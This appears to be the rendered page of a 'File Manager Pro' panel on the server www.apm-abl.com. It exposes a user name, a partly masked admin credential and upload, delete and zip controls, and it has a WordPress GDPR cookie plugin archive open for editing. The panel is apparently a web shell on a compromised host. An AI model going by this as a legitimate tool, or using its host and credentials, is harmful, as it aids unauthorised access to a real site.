🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_937f8c22 / 2de9****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: gdpr-cookie-compliance.tar
class-moove-gdpr-options.php 0000644 00000007353 15136114115 0012136 0 ustar 00 <?php /** * Moove_GDPR_Options File Doc Comment * * @category Moove_GDPR_Options * @package gdpr-cookie-compliance * @author Moove Agency */ if ( ! defined( 'ABSPATH' ) ) { exit; } // Exit if accessed directly /** * Moove_GDPR_Options Class Doc Comment * * @category Class * @package Moove_GDPR_Options * @author Moove Agency */ class Moove_GDPR_Options { /** * Global options * * @var array */ private $options; /** * Construct */ public function __construct() { add_action( 'admin_menu', array( &$this, 'moove_gdpr_admin_menu' ) ); } /** * Moove feed importer page added to settings * * @return void */ public function moove_gdpr_admin_menu() { $gdpr_settings_page = add_menu_page( 'GDPR Cookie', // Page_title. 'GDPR Cookie Compliance', // Menu_title. apply_filters( 'gdpr_options_page_cap', 'manage_options' ), // Capability. 'moove-gdpr', // Menu_slug. array( &$this, 'moove_gdpr_settings_page' ), // Function. 'data:image/svg+xml;base64,PCEtLSBHZW5lcmF0ZWQgYnkgSWNvTW9vbi5pbyAtLT4KPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjEwMjQiIGhlaWdodD0iMTAyNCIgdmlld0JveD0iMCAwIDEwMjQgMTAyNCI+Cjx0aXRsZT48L3RpdGxlPgo8ZyBpZD0iaWNvbW9vbi1pZ25vcmUiPgo8L2c+CjxwYXRoIGZpbGw9IiNhMGE1YWEiIGQ9Ik04NDAuNzA0IDUzMS40NTZ2MTgxLjI0OHEwIDY4LjYwOC00OC4xMjggMTE2LjczNnQtMTE1LjcxMiA0OC4xMjhoLTQ3Ni4xNnEtNjcuNTg0IDAtMTE1LjcxMi00OC4xMjh0LTQ4LjEyOC0xMTYuNzM2di00NzUuMTM2cTAtNjcuNTg0IDQ4LjEyOC0xMTUuNzEydDExNS43MTItNDkuMTUyaDQ3Ni4xNnEzNS44NCAwIDY2LjU2IDE0LjMzNiA4LjE5MiA0LjA5NiAxMC4yNCAxMy4zMTIgMi4wNDggMTAuMjQtNS4xMiAxNi4zODRsLTI3LjY0OCAyOC42NzJxLTYuMTQ0IDUuMTItMTMuMzEyIDUuMTItMi4wNDggMC01LjEyLTEuMDI0LTEzLjMxMi0zLjA3Mi0yNS42LTMuMDcyaC00NzYuMTZxLTM2Ljg2NCAwLTY0LjUxMiAyNi42MjR0LTI2LjYyNCA2NC41MTJ2NDc1LjEzNnEwIDM3Ljg4OCAyNi42MjQgNjQuNTEydDY0LjUxMiAyNy42NDhoNDc2LjE2cTM3Ljg4OCAwIDY0LjUxMi0yNy42NDh0MjYuNjI0LTY0LjUxMnYtMTQ0LjM4NHEwLTguMTkyIDUuMTItMTMuMzEybDM2Ljg2NC0zNS44NHE1LjEyLTYuMTQ0IDEzLjMxMi02LjE0NCAzLjA3MiAwIDYuMTQ0IDIuMDQ4IDExLjI2NCA0LjA5NiAxMS4yNjQgMTYuMzg0ek05NzIuOCAyNTEuOTA0bC00NjQuODk2IDQ2NC44OTZxLTEzLjMxMiAxNC4zMzYtMzIuNzY4IDE0LjMzNnQtMzEuNzQ0LTE0LjMzNmwtMjQ1Ljc2LTI0NS43NnEtMTQuMzM2LTEzLjMxMi0xNC4zMzYtMzEuNzQ0dDE0LjMzNi0zMi43NjhsNjIuNDY0LTYzLjQ4OHExMy4zMTItMTMuMzEyIDMyLjc2OC0xMy4zMTJ0MzIuNzY4IDEzLjMxMmwxNDkuNTA0IDE1MC41MjggMzY5LjY2NC0zNjkuNjY0cTE0LjMzNi0xMy4zMTIgMzIuNzY4LTEzLjMxMnQzMi43NjggMTMuMzEybDYyLjQ2NCA2Mi40NjRxMTQuMzM2IDE0LjMzNiAxNC4zMzYgMzIuNzY4dC0xNC4zMzYgMzIuNzY4eiI+PC9wYXRoPgo8L3N2Zz4K', // Icon. 90 // Position. ); $plugin_tabs = gdpr_get_admin_submenu_items(); $current_tab = isset( $_GET['tab'] ) ? sanitize_text_field( wp_unslash( $_GET['tab'] ) ) : ''; if ( isset( $current_tab ) && '' !== $current_tab ) : $active_tab = $current_tab; else : $active_tab = 'branding'; endif; // end if. $plugin_link = esc_url( admin_url( 'admin.php?page=moove-gdpr&tab=branding' ) ); foreach ( $plugin_tabs as $plugin_tab ) : $gdpr__sub_settings_page = add_submenu_page( 'moove-gdpr', $plugin_tab['title'], $plugin_tab['title'], apply_filters( 'gdpr_options_page_cap', 'manage_options' ), // Capability. 'moove-gdpr_' . $plugin_tab['slug'], array( &$this, 'moove_gdpr_settings_page' ) ); add_action( 'load-' . $gdpr__sub_settings_page, array( 'Moove_GDPR_Actions', 'moove_gdpr_admin_scripts' ) ); endforeach; add_action( 'load-' . $gdpr_settings_page, array( 'Moove_GDPR_Actions', 'moove_gdpr_admin_scripts' ) ); } /** * Settings page registration * * @return void */ public function moove_gdpr_settings_page() { $data = array(); $view_cnt = new GDPR_View(); $content = $view_cnt->load( 'moove.admin.settings.settings-page', $data ); apply_filters( 'gdpr_cc_keephtml', $content, true ); } } new Moove_GDPR_Options(); assets/styles/main.scss 0000644 00000000134 15136114115 0011206 0 ustar 00 @import "../modules/fonts"; @import "../modules/gdpr_lightbox"; @import "../modules/global"; assets/styles/back-end/_global.scss 0000644 00000104674 15136114115 0013343 0 ustar 00 .moove-gdpr-donation-box-wrapper { width: auto; margin: 10px 20px 0 2px; .moove-gdpr-donate-form { float: left; margin-right: 20px; } .moove-donation-box { padding-bottom: 20px; } } .gdpr-admin-lbl { padding: 2px 5px; font-size: 12px; background-color: #777; color: #fff; border-radius: 4px; display: inline-block; &.gdpr-active { background-color: #5cb85c; color: #fff; } &.gdpr-inactive { background-color: #777; color: #fff; } &.gdpr-error { background-color: #d9534f; color: #fff; } } .gdpr-msba-wrap .licence-key-wrap { display: flex; align-items: center; padding: 20px; background-color: #fff; border: 1px solid #c3c4c7; margin: 20px 0; } .gdpr-msba-wrap .licence-key-wrap label { font-weight: 700; } .gdpr-msba-wrap .wp-list-table tr.disabled { opacity: 0.4; pointer-events: none; } .gdpr-msba-wrap .licence-key-wrap #gdpr_msba_licence_key-error { position: absolute; font-size: 10px; color: red; right: 5px; bottom: 0; font-weight: 400; } .gdpr-msba-wrap .msba-progress-bar { padding: 10px; background-color: #fff; margin-bottom: 20px; border: 1px solid #c3c4c7; } .gdpr-msba-wrap .msba-progress { background-color: #c3c4c7; transition: all 0.3s ease; } .gdpr-msba-wrap .licence-key-wrap .input-wrap { flex: 1; width: 100%; position: relative; } .gdpr-msba-wrap .licence-key-wrap input { padding: 0 10px; width: 100%; } .gdpr-msba-wrap .licence-key-wrap input.error { border-color: red; } .gdpr-msba-wrap .gdpr-msba-select-all { font-size: 12px; padding: 5px; height: auto; min-height: auto; line-height: 1; margin: 5px; } .gdpr-tt-licence { display: flex; align-items: center; justify-content: space-between; } .form-table .gdpr-gsk-table { width: 100%; border: 1px solid #f1f1f1; } .form-table .gdpr-gsk-table select { width: 100%; } .form-table .gdpr-gsk-table th { padding: 10px 15px; background-color: #50575e; color: #fff; border: none; width: auto; } .form-table .gdpr-gsk-table td { border-top: 1px solid #f1f1f1; background-color: #fff; padding: 10px 15px; } .form-table .gdpr-gsk-table td .gdpr-checkbox-toggle { margin: 5px 0; } .gdpr_cb_bhv_desc { display: block; font-size: 12px; line-height: 1.2; margin-top: 2px; font-style: italic; } #moove_form_checker_wrap.gdpr-hide-submenu { box-sizing: border-box; .nav-tab-wrapper { display: none; } .moove-gdpr-form-container { width: 100%; box-sizing: border-box; min-height: auto; } } #moove_form_checker_wrap .nav-tab-wrapper a.nav-tab, #moove_form_checker_wrap .moove-gdpr-form-container, #moove_form_checker_wrap .nav-tab-wrapper, .moove-plugins-info-boxes { box-sizing: content-box; } #moove_form_checker_wrap { .nav-tab-wrapper a.nav-tab.gdpr-cc-addon { background-color: #f79322; color: #fff; &:hover { color: #f79322; background-color: #fff; } &.nav-tab-active { background-color: #fff; color: #f79322; &:after { background-color: #ffffff; } } } } fieldset.gdpr-close-options { label { font-weight: 500; span { font-weight: 300; } } } #moove_form_checker_wrap .gdpr-faq-accordion-content .cm-s-default .cm-string-2 { color: inherit; } .gdpr-tab-section-cnt .gdpr-sortable-buttons-wrap { > td { padding: 0; } .gdpr-sortable-buttons { width: 100%; counter-reset: gdpr_admin_sb; table { width: 100%; } p { font-size: 12px; } .gdpr-sortable-button { border: 1px solid #e5e5e5; padding: 0 20px 20px 60px; position: relative; counter-increment: gdpr_admin_sb; margin: 10px 0; background-color: #fff; &.ui-state-disabled { pointer-events: none; * { pointer-events: auto; } } &::before { position: absolute; content: counter(gdpr_admin_sb); top: 1px; left: 1px; width: 30px; height: calc(100% - 2px); background-color: #f5f5f5; color: #23282d; text-align: center; line-height: 30px; border: none; padding: 0; box-shadow: none; transition: all .4s ease; cursor: pointer; display: flex; align-items: center; justify-content: center; border-right: 1px solid #e5e5e5; font-weight: 500; font-size: 14px; } } td { padding: 0; } } } #moove_form_checker_wrap > .notice.is-dismissible:not(.gdpr-cc-notice) { display: none !important; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-dark { background-color: #1d2327; color: #f0f0f1; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-dark:hover { background-color: #fff; color: #f79322; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-dark.nav-tab-active { background-color: #fff; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-white { background-color: #fff; color: #1d2327; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-white:hover { color: #f79322; } .gdpr-tab-section-cnt .nav-tab-wrapper a.nav-tab-white.nav-tab-active { color: #f79322; } .gdpr-admin-popup { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 999; display: flex; align-items: center; justify-content: center; .gdpr-popup-close { position: absolute; top: -15px; right: -15px; width: 30px; height: 30px; text-decoration: none; border-radius: 50%; display: flex; align-items: center; justify-content: center; background-color: #f79322; color: #fff; transition: all .4 ease; &:hover { background-color: #232323; } } .gdpr-popup-overlay { background-color: rgba(0,0,0,0.8); position: absolute; top: 0; left: 0; bottom: 0; right: 0; z-index: 15; } .gdpr-popup-content { width: 420px; max-width: 70vw; background-color: #fff; padding: 30px; border-radius: 8px; text-align: center; position: relative; z-index: 35; p { font-size: 14px; line-height: 20px; margin-top: 0; } h4 { font-size: 18px; line-height: 28px; margin-top: 0; } } } #moove-gdpr-setting-error-settings_updated .wrap { width: 100%; margin: 0; p { padding-left: 0; margin-left: 0; } } .gdpr-video-tutorial-content { position: relative; padding-bottom: 56.25%; /* 16:9 */ padding-top: 25px; height: 0; } .gdpr_admin_link { text-decoration: none; color: #f79322; transition: all .4s ease; &.gdpr_premium_buy_link { font-weight: 600; } &:hover { text-decoration: underline; color: #f79322; } } .gdpr_license_info { font-style: italic; } #moove_gdpr_license_settings { .wrap, pre { width: 100%; white-space: normal; word-break: break-all; margin: 0; span { font-size: 13px; } p { margin-bottom: 0; } } .gdpr_license_log { padding: 0; } } .gdpr-video-tutorial-content iframe { width: 100%; height: auto; position: absolute; top: 0; left: 0; height: 100%; } .gdpr-faq-accordion-content { textarea { width: 100%; height: auto; height: 200px; } } .gdpr-cookie-alert { background-color: #f79322; border: 1px solid #f79322; color: #fff; box-shadow: 0 3px 51px 0 rgba(0,0,0,.05); padding: 10px; display: inline-block; width: auto; box-sizing: border-box; margin: 10px 0 20px; border-radius: 3px; padding-right: 50px; position: relative; &.gdpr-cookie-alert-dark { background-color: #23282d; border-color: #23282d; display: block; width: 100%; span.gdpr-dismiss, span.gdpr-dismiss-update { color: #fff; top: 6px; &:hover { color: #f79322; } } } &.gdpr-cookie-update-alert { display: block; width: 100%; background-color: #fff; border: 1px solid #ccc; box-shadow: 0 3px 51px 0 rgba(0,0,0,0.05); color: #23282d; a { color: #f79322; } span.gdpr-dismiss, span.gdpr-dismiss-update { color: #23282d; &:hover { color: #f79322; } } } span.gdpr-dismiss, span.gdpr-dismiss-update { position: absolute; top: 4px; right: 8px; font-size: 25px; font-weight: 400; line-height: 1; color: #fff; cursor: pointer; transition: all .4s ease; &:hover { color: #23282d; } } h4 { margin: 0 0 10px; font-size: 16px; } p { margin: 0; font-size: 13px; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; strong { padding: 2px 3px; display: inline-block; background-color: #fff; color: #23282d; margin: 0 5px; } } } .gdpr-disabled { pointer-events: none; cursor: default; opacity: .5; } .gdpr-script-tabs-main-cnt { position: relative; overflow: hidden; } body.toplevel_page_moove-gdpr { background-color: #fff; } #moove_form_checker_wrap { button.button-primary.button-reset-settings { float: right; background-color: #262c33; border-color: #737373; opacity: 0.5; &:hover { opacity: 1; } } } #moove_form_checker_wrap .moove-gdpr-form-container { min-height: 920px; } .gdpr_license_log_alert { padding: 0; .wrap { > h1, > p, > .update-messages { display: none; } } .gdpr-admin-alert { position: relative; padding-right: 40px; margin: 20px 0; .gdpr-alert-content { padding-right: 30px; } .dashicons { position: absolute; top: 5px; right: 5px; width: 30px; height: 30px; border-radius: 50%; display: flex; align-items: center; justify-content: center; color: rgba(5,150,24,0.5); font-size: 34px !important; background-color: #fff; } a { color: inherit; text-decoration: underline; margin-right: 5px; font-weight: 500; &:hover { color: #262c33; text-decoration: underline; } } &.gdpr-admin-alert-success { background-color: rgba(5,150,24,0.1); color: rgba(5,150,24,1); padding: 5px 10px; border-radius: 15px; border: 2px solid rgba(5,150,24,0.5); } &.gdpr-admin-alert-error { background-color: rgba(225,0,0,0.1); color: rgba(225,0,0,1); padding: 5px 10px; border-radius: 15px; border: 2px solid rgba(225,0,0,0.5); .dashicons { color: rgba(225,0,0,0.5); } } &.gdpr-admin-alert-info { background-color: rgba(0,0,0,0.1); color: rgba(0,0,0,1); padding: 5px 10px; border-radius: 15px; border: 2px solid rgba(0,0,0,0.5); .dashicons { color: rgba(0,0,0,0.5); } } p { margin: 5px 0; } } } .gdpr-plugin-star-rating { display:inline-block; color:#ffb900; position:relative; top:3px; svg{ fill:#ffb900; &:hover{ fill:#ffb900 } } svg:hover ~ svg{ fill:none; } } .gdpr-help-content-cnt { .gdpr-help-content-block { margin-top: 20px; // padding: 20px; // border: 1px solid #ccc; } .gdpr-faq-toggle { box-shadow: 0 3px 51px 0 rgba(0,0,0,.05); border: 1px solid #ccc; margin-bottom: 20px; code { display: block; white-space: pre-wrap } ul { li { position: relative; padding-left: 15px; &::before { content: ""; position: absolute; top: 7px; left: 0; width: 5px; height: 5px; border-radius: 50%; background-color: #f79322; } } } &.gdpr-faq-open { .gdpr-faq-accordion-header { h3 { background-color: #f79322; color: #fff; &:after { content: "-"; } } } } .gdpr-faq-accordion-header { h3 { margin: 0; position: relative; padding: 15px 20px; padding-right: 60px; cursor: pointer; transition: all .3s ease; font-size: 16px !important; &:hover { background-color: #f79322; color: #fff; } &:after { content: "+"; width: 50px; position: absolute; top: 0; right: 0; border-left: 1px solid #ccc; display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; font-size: 26px; text-align: center; bottom: 0; justify-content: center; } } } .gdpr-faq-accordion-content { padding: 15px 60px 15px 20px; border-top: 1px solid #ccc; code { line-height: 1.8; overflow: auto; display: block; } } } } .gdpr-disable-posts-nav { list-style-type: none; padding: 5px 10px; margin: 20px 0; background-color: #fff; box-shadow: 0 3px 51px 0 rgba(0,0,0,.05); border: 1px solid #ccc; } .gdpr-disable-posts-nav li:first-child a { padding-left: 0; } .gdpr-disable-posts-nav li:last-child a { padding-right: 0; } .gdpr-disable-posts-nav li:after { content: "|"; display: inline-block; position: absolute; right: -2px; top: 10px; } .gdpr-disable-posts-nav li:last-child:after, .gdpr-disable-posts-nav li:first-child:after { display: none; } .gdpr-disable-posts-nav li { list-style: none; display: inline-block; float: left; position: relative; margin: 0; } .gdpr-disable-posts-nav li a.active { color: #f79322; } .gdpr-disable-posts-nav li a, .gdpr-disable-posts-nav li strong { display: block; padding: 10px 10px; outline: none; box-shadow: none; } .gdpr-disable-posts-nav li strong { padding-left: 0; } body[class*="toplevel_page_moove-gdpr"], body[class*="gdpr-cookie-compliance_page_moove-gdpr"] { background-color: #fff; #wpcontent{ background-color: #fff; } } .gdpr-script-tab-content { position: relative; overflow: hidden; .gdpr-tab-code-section { transition: all .8s ease; top: 0; right: 0; left: 0; } .gdpr-tab-code-section:not(.gdpr-active) { height: 0; opacity: 0; margin: 0; position: absolute; top: 100%; visibility: hidden; } } .gdpr-tab-code-section-nav { ul { list-style-type: none; padding: 0; margin: 20px 1px 0; display: flex; li { list-style: none; padding: 0; margin: 0 -1px; position: relative; border: 1px solid #f79322; border-bottom: 0; overflow: hidden; &:first-child { border-top-left-radius: 10px; } &:last-child { border-top-right-radius: 10px; } a { background-color: #fff; display: block; padding: 8px 20px; text-decoration: none; font-weight: 500; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-size: 14px; color: #555; transition: all .3s ease; outline: none; box-shadow: none; &:before { content: "\21B3"; transform: rotate(90deg); display: inline-block; position: absolute; top: 0; left: 0; width: 0; color: #fff; opacity: 0; transition: all .3s ease; } &.gdpr-active { &:before { opacity: 1; top: 4px ; left: 10px; } } &:hover, &.gdpr-active { background-color: #f79322; color: #fff; } } } } } .gdpr-tab-code-section { background-color: #fff; padding: 20px; border: 1px solid #f79322; border-bottom-left-radius: 10px; border-bottom-right-radius: 10px; border-top-right-radius: 10px; position: relative; overflow-wrap: hidden; .CodeMirror { font-size: 15px; width: 100%; height: 300px; box-sizing: border-box; background-color: #fff; border: 1px solid #ccc; } .CodeMirror-gutters { padding-bottom: 0; background-color: #f1f1f1; } p.description { font-weight: 500; font-size: 13px; } h4 { margin: -20px -20px 0; padding: 15px 20px; border-bottom: 1px solid #ccc; } table { width: 100%; } .gdpr-code { padding: 10px; background-color: #f1f1f1; } } .gdpr-img-responsive { max-width: 100%; height: auto; } .gdpr-tab-section-cnt { max-width: calc(100% - 380px); display: inline-block; width: 100%; .regular-text { width: 100%; } .powered-by-label { display: flex; align-items: center; margin-bottom: 15px; label { white-space: nowrap; margin-right: 20px; } } &.gdpr-has-premium { max-width: 100%; + .moove-plugins-info-boxes { display: none; } } } .gdpr-conditional-field:not(.gdpr-conditional-on) { display: none; } /* The switch - the box around the slider */ .gdpr-checkbox-toggle { position: relative; display: inline-block; width: 160px; height: 24px; box-sizing: border-box; * { box-sizing: border-box; } &.gdpr-checkbox-inverted { input { &:checked + .gdpr-checkbox-slider { background-color: red; &:after { content: attr(data-disable); } } } .gdpr-checkbox-slider { background-color: #2e9935; &:after { content: attr(data-enable); } } } &.gdpr-color-scheme-toggle { input { &:checked + .gdpr-checkbox-slider { background-color: #202020; &:after { color: #fff; } &:before { background-color: #fff; } } } .gdpr-checkbox-slider { background-color: #fff; &:after { color: #202020; } &:before { background-color: #202020; } } } input { opacity: 0; width: 0; height: 0; &:checked + .gdpr-checkbox-slider { background-color: #2e9935; &:after { content: attr(data-enable); } &:before { -webkit-transform: translateX(136px); -ms-transform: translateX(136px); transform: translateX(136px); } } } .gdpr-checkbox-slider { position: absolute; cursor: pointer; top: 0; left: 0; right: 0; bottom: 0; background-color: red; -webkit-transition: .4s; transition: .4s; border-radius: 34px; border: 1px solid #ddd; &:before { position: absolute; content: ""; height: 20px; width: 20px; left: 1px; bottom: 1px; background-color: white; -webkit-transition: .4s; transition: .4s; border-radius: 50%; } &:after { content: attr(data-disable); position: absolute; top: 5px; left: 0; right: 0; color: #fff ; font-size: 12px; display: block; z-index: 4; text-transform: uppercase; text-align: center; font-weight: 600; font-family: 'Helvetica'; letter-spacing: 0.5px; } } } .moove-plugins-info-boxes { display: inline-block; float: right; width: 350px; background-color: #fff; .m-plugin-box { border: 1px solid #ccc; margin-bottom: 30px; background-color: #fff; border-radius: 5px; box-shadow: 0 3px 51px 0 rgba(0,0,0,.05); img { max-width: 100%; height: auto; } &.m-plugin-box-highlighted { border: 2px solid #f79322; .box-header { background-color: #f79322; border-color: #f79322; color: #fff; } } &.m-plugin-box-support:not(.m-plugin-box-highlighted) { .gdpr-review-bnt { background-color: rgba(85,85,85,0.5); color: #fff; &:hover { background-color: #232323; color: #fff; } } } .box-content { .gdpr-faq-forum-content { p { position: relative; padding-left: 15px; line-height: 1.3; margin-bottom: 10px; .gdpr-chevron-left { color: #f79322; font-size: 18px; position: absolute; left: 0; top: 7px; line-height: 0; } } } } a:not(.gdpr-review-bnt):not(.plugin-buy-now-btn) { color: #f79322; transition: all .3s ease; &:hover { color: #23282d; } } .gdpr-review-bnt { text-decoration: none; outline: none; padding: 7px 20px; font-size: 12px; font-weight: 500; background-color: #f79322; color: #fff; transition: all .3s ease; line-height: 18px; border: none; display: inline-block; margin: 10px 0; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; &:hover { background-color: #262c33; } } .box-header { padding: 10px; border-bottom: 1px solid #ccc; h4 { font-size: 14px; font-weight: 500; margin: 0; } } .box-content { padding: 10px; p { margin-top: 5px; margin-bottom: 5px; } hr { margin: 10px 0; } } .plugin-rating { display: flex; margin: 10px 0 20px; align-items: center; transform: scale(1.3); width: 100%; padding-left: 13%; .plugin-stars { display: inline-block; width: 50%; } } .gdpr-review-container { display: block; text-align: left; margin: 0; } .plugin-stats { display: flex; * { box-sizing: border-box; } .plugin-download-ainstalls-cnt { display: inline-block; width: calc( 100% - 130px ); line-height: 20px; } .plugin-rating { width: 125px; box-sizing: border-box; text-align: right; display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; -ms-flex-pack: end; justify-content: flex-end; padding: 0; margin: 0; .plugin-stars { width: 100px; transform: scale(0.8); } } } .plugin-features { padding-left: 20px; margin-top: 5px; li { list-style-type: square; } } .plugin-buy-now-btn { display: block; text-decoration: none; outline: none; box-shadow: none; padding: 7px 20px; background-color: #f79322; color: #fff; text-align: center; transition: all .3s ease; margin: 15px 0; font-weight: 500; font-size: 12px; &:hover { background-color: #232323; } } } } .gdpr-tab-section-cnt { position: relative; overflow: hidden; .form-table th { width: 250px; max-width: 250px; } } @media (max-width: 768px) { .moove-gdpr-donation-box-wrapper { // padding-right: 20px !important; } } @media (max-width: 1280px) { .gdpr-tab-section-cnt { max-width: 100%; display: block; width: 100%; .form-table th { width: 200px; } } .moove-plugins-info-boxes { display: inline-block; float: none; width: 100%; padding: 0; margin: 15px 0; background-color: #f1f1f1; } } .gdpr-locked-section { padding: 0 40px 0px; background-color: #fff; border: 1px solid #ccc; display: flex; align-self: center; margin-top: 90px; border-radius: 5px; span { display: block; width: 100%; transform: translateY(-50px); text-align: center; } h4 { font-size: 28px; line-height: 32px; margin: 60px 0 30px; text-align: center; } * { box-sizing: border-box; } i { font-size: 30px; line-height: 55px; color: #f79322; width: 60px; height: 50px; background-color: #fff; border: 1px solid #ccc; border-bottom: 1px solid #fff; border-top-left-radius: 100px; border-top-right-radius: 100px; } .plugin-buy-now-btn { display: block; text-decoration: none; outline: none; box-shadow: none; padding: 7px 20px; background-color: #f79322; color: #fff; text-align: center; transition: all .3s ease; margin: 15px auto 0; font-weight: 500; font-size: 12px; max-width: 200px; &:hover { background-color: #232323; } } } #moove_form_checker_wrap .nav-tab-wrapper a.nav-tab.gdpr-cc-addon.gdpr-cc-disabled { background-color: #fff; color: #f79322; } .moove-donation-box { position: relative; width: calc(100% - 20px); margin: 16px 0; padding: 0 15px 10px; box-shadow: 0 1px 1px rgba(0, 0, 0, .04); background: #fff; font-size: 13px; } .moove-donation-box .notice-dismiss:before { float: left; margin: 0 4px -2px 0; } .moove-redirect-box { width: 100%; } .moove-not-visible { opacity: 0; visibility: hidden; position: absolute; } .moove-gdpr-form-container .moove-logo { // display: block; // width: 67px; // height: 16px; // position: absolute; // top: 25px; // right: 20px; // background: url('../images/moove_logo_br.png') no-repeat; // background-size: cover; } .moove-gdpr-form-container { min-height: 45vh; input[type=radio].on-off { margin: 0; } input.iris-colorpicker { text-shadow: 1px 0 0 #fff, -1px 0 0 #fff, 0 1px 0 #fff, 0 -1px 0 #fff, 1px 1px #fff, -1px -1px 0 #fff, 1px -1px 0 #fff, -1px 1px 0 #fff; text-transform: uppercase; outline: none !important; box-shadow: none !important; font-weight: 500; font-size: 14px; border: none; width: 120px; height: 30px; margin: 0; border-top-left-radius: 5px; border-bottom-left-radius: 5px; } .iris-selectbtn { position: relative; background-color: #fff; display: inline-block; padding: 0 5px; text-transform: uppercase; font-size: 11px; line-height: 30px; font-weight: 500; float: right; border-top-right-radius: 5px; border-bottom-right-radius: 5px; cursor: pointer; } .iris-colorpicker-group-cnt { display: inline-block; border: 1px solid #ddd; border-radius: 5px; } .iris-picker { position: absolute; &:before { content: ""; position: fixed; width: 100%; height: 100%; top: 0; left: 0; } .iris-picker-inner { z-index: 100; } } } .moove-clearfix::after { content: ""; clear: both; display: table; } .moove_gdpr_company_logo_holder { display: inline-block; padding-bottom: 50px; width: 130px; height: 0; background-position: left center; background-repeat: no-repeat; background-size: contain; cursor: pointer; } #wp-moove_gdpr_privacy_overview_tab_content-wrap, #wp-moove_gdpr_strict_necessary_cookies_tab_content-wrap, #wp-moove_gdpr_performance_cookies_tab_content-wrap, #wp-moove_gdpr_advanced_cookies_tab_content-wrap, #wp-moove_gdpr_info_bar_content-wrap, #wp-moove_gdpr_cookies_policy_tab_content-wrap, #wp-moove_gdpr_strictly_necessary_cookies_warning-wrap, #wp-moove_gdpr_ifb_content-wrap, #wp-moove_gdpr_modal_strictly_secondary_notice-wrap { max-width: 100%; } span.separator { display: inline-block; margin-left: 10px; } .gdpr-cookie-compliance-header-section { padding-left: 100px; position: relative; margin: 30px 0; a { color: #f79322; } &:before { content: ""; position: absolute; left: 0; top: 0; width: 100px; height: 100px; background-image: url('../images/gdpr-cookie-compliance-icon.png'); background-position: 0 center; background-repeat: no-repeat; background-size: contain; } h2 { font-size: 30px; font-weight: 500; padding-top: 25px; margin-bottom: 10px; .gdpr-plugin-version { font-size: 16px; font-weight: 400; font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; color: #565656; margin-left: 5px; } } h4 { margin-top: 10px; } } #moove_form_checker_wrap { position: relative; .button-primary { background-color: #f89e26; border: none; border-radius: 0; text-shadow: none; box-shadow: none; outline: none; padding: 8px 15px; font-size: 12px; font-weight: 400; color: #fff; transition: all .3s ease; height: auto; line-height: 18px; border: 1px solid #d28b21; &:hover { background-color: #262c33; border: 1px solid #737373; } &.button-inverse { background-color: #262c33; border: 1px solid #737373; &:hover { background-color: #f89e26; border: 1px solid #d28b21; } } } h1 { margin: 0; padding: 0; } h2, h3 { font-weight: 500; font-size: 20px; } .gdpr-tab-section-cnt { &:after { content: ""; clear: both; display: table; } } .nav-tab-wrapper { width: 200px; display: inline-block; padding-right: 17px; padding-top: 0; position: relative; a.nav-tab { font-size: 14px; padding: 10px 8px; width: 100%; font-weight: 400; margin-left: 0; outline: none; box-shadow: none; border-right: 0; position: relative; white-space: normal; line-height: 1.3; border-bottom: 1px solid rgba(255,255,255,0.1); border-top: 1px solid rgba(255,255,255,0.1); margin-bottom: -1px; display: flex; align-items: center; .dashicons { margin-right: 5px; } &:hover { border-top-color: #ccc; border-bottom-color: #ccc; } } a.nav-tab-active, a.nav-tab-active:focus, a.nav-tab-active:focus:active, a.nav-tab-active:hover { border-bottom: 1px solid #ccc; color: #f79322; outline: none ; box-shadow: none; background-color: #fff; border-top-color: #ccc; border-bottom-color: #ccc; } .nav-tab-active:after { content: ""; position: absolute;; right: -1px; top: 0; width: 2px; bottom: 0; background-color: #fff; } } .moove-gdpr-form-container { width: calc( 100% - 279px ); float: right; padding: 5px 30px 30px; border: 1px solid #ccc; } } #moove_gdpr_info_bar_content-html, #moove_gdpr_info_bar_content-tmce { // display: none; } #moove_form_checker_wrap .moove-gdpr-settings-branding { margin: 25px 0; font-style: italic; hr { margin: 0; } p { margin: 15px 0; span { display: inline-block; background-image: url('../images/moove_logo_br.png'); width: 66px; height: 15px; background-size: contain; background-repeat: no-repeat; background-position: left bottom; } a { text-decoration: none; color: inherit; &:hover { text-decoration: underline; } } } } .moove-gdpr-form-error { .alert.script-error { color: #fff; padding: 10px; background-color: red; text-transform: uppercase; } } assets/styles/back-end/_codemirror.scss 0000644 00000026115 15136114115 0014241 0 ustar 00 /* BASICS */ #moove_form_checker_wrap .CodeMirror { /* Set height, width, borders, and global font properties here */ font-family: monospace; // height: 300px; height: auto; color: black; direction: ltr; } #moove_form_checker_wrap .gdpr-faq-accordion-content .CodeMirror { // max-height: 300px; } /* PADDING */ #moove_form_checker_wrap .CodeMirror-lines { padding: 4px 0; /* Vertical padding around content */ } #moove_form_checker_wrap .CodeMirror pre { padding: 0 4px; /* Horizontal padding of content */ } #moove_form_checker_wrap .CodeMirror-scrollbar-filler, #moove_form_checker_wrap .CodeMirror-gutter-filler { background-color: white; /* The little square between H and V scrollbars */ } /* GUTTER */ #moove_form_checker_wrap .CodeMirror-gutters { border-right: 1px solid #ddd; background-color: #f7f7f7; white-space: nowrap; } 